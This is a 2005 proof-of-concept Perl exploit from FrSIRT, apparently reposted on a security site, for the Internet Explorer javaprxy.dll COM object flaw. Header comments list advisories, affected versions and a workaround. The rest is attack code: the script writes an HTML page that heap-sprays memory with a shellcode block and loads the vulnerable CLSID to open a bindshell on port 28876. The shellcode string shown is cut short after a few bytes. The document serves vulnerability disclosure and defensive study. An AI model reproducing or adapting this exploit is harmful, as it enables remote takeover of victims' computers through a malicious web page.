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Microsoft Internet Explorer javaprxy.dll Command Execution Exploit
来源:http://www.frsirt.com 作者:FrSIRT 发布时间:2005-07-04  

Microsoft Internet Explorer "javaprxy.dll" Command Execution Exploit

# Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit -Unpatched-
# Proof of Concept by the FrSIRT < http://www.frsirt.com / team@frsirt.com >
# Bindshell on port 28876
# 01 July 2005
# Description - http://www.frsirt.com/english/advisories/2005/0935
# Workarounds - http://www.microsoft.com/technet/security/advisory/903144.mspx
# sec-consult - http://www.sec-consult.com/184.html
# Solution :
# Set Internet and Local intranet security zone settings to "High" or use
# another browser until a patch is released.
# Tested on :
# Internet Explorer 6 on Microsoft Windows XP SP2
# Internet Explorer 6 on Microsoft Windows XP SP1
# Affected versions :
# Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4
# Internet Explorer 6 Service Pack 1 on Microsoft Windows XP Service Pack 1
# Internet Explorer 6 for Microsoft Windows XP Service Pack 2
# Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit SP1 (Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003
# Internet Explorer 6 for Microsoft Windows Server 2003 Service Pack 1
# Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems
# Internet Explorer 6 for Microsoft Windows Server 2003 with SP1 for Itanium
# Internet Explorer 6 for Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition
# Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition
# Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 SE
# Internet Explorer 6 Service Pack 1 on Microsoft Windows Millennium Edition
# Usage : perl iejavaprxyexploit.pl > mypage.html

# header
my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n";

# Win32 bindshell (port 28876) - SkyLined
my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".

# Memory
my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
"headersize = 20;\n".
"slackspace = headersize+shellcode.length\n".
"while (bigblock.length<slackspace) bigblock+=bigblock;\n".
"fillblock = bigblock.substring(0, slackspace);\n".
"block = bigblock.substring(0, bigblock.length-slackspace);\n".
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n".
"memory = new Array();\n".
"for (i=0;i<750;i++) memory[i] = block + shellcode;\n".

# javaprxy.dll
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0';

# footer
my $footer = "<object classid=\"CLSID:".$clsid."\"></object>\n".
"Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n".
"by the FrSIRT < http://www.frsirt.com >\n".
"Solution - http://www.frsirt.com/english/advisories/2005/0935".

# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
print "$header $shellcode $code $footer";

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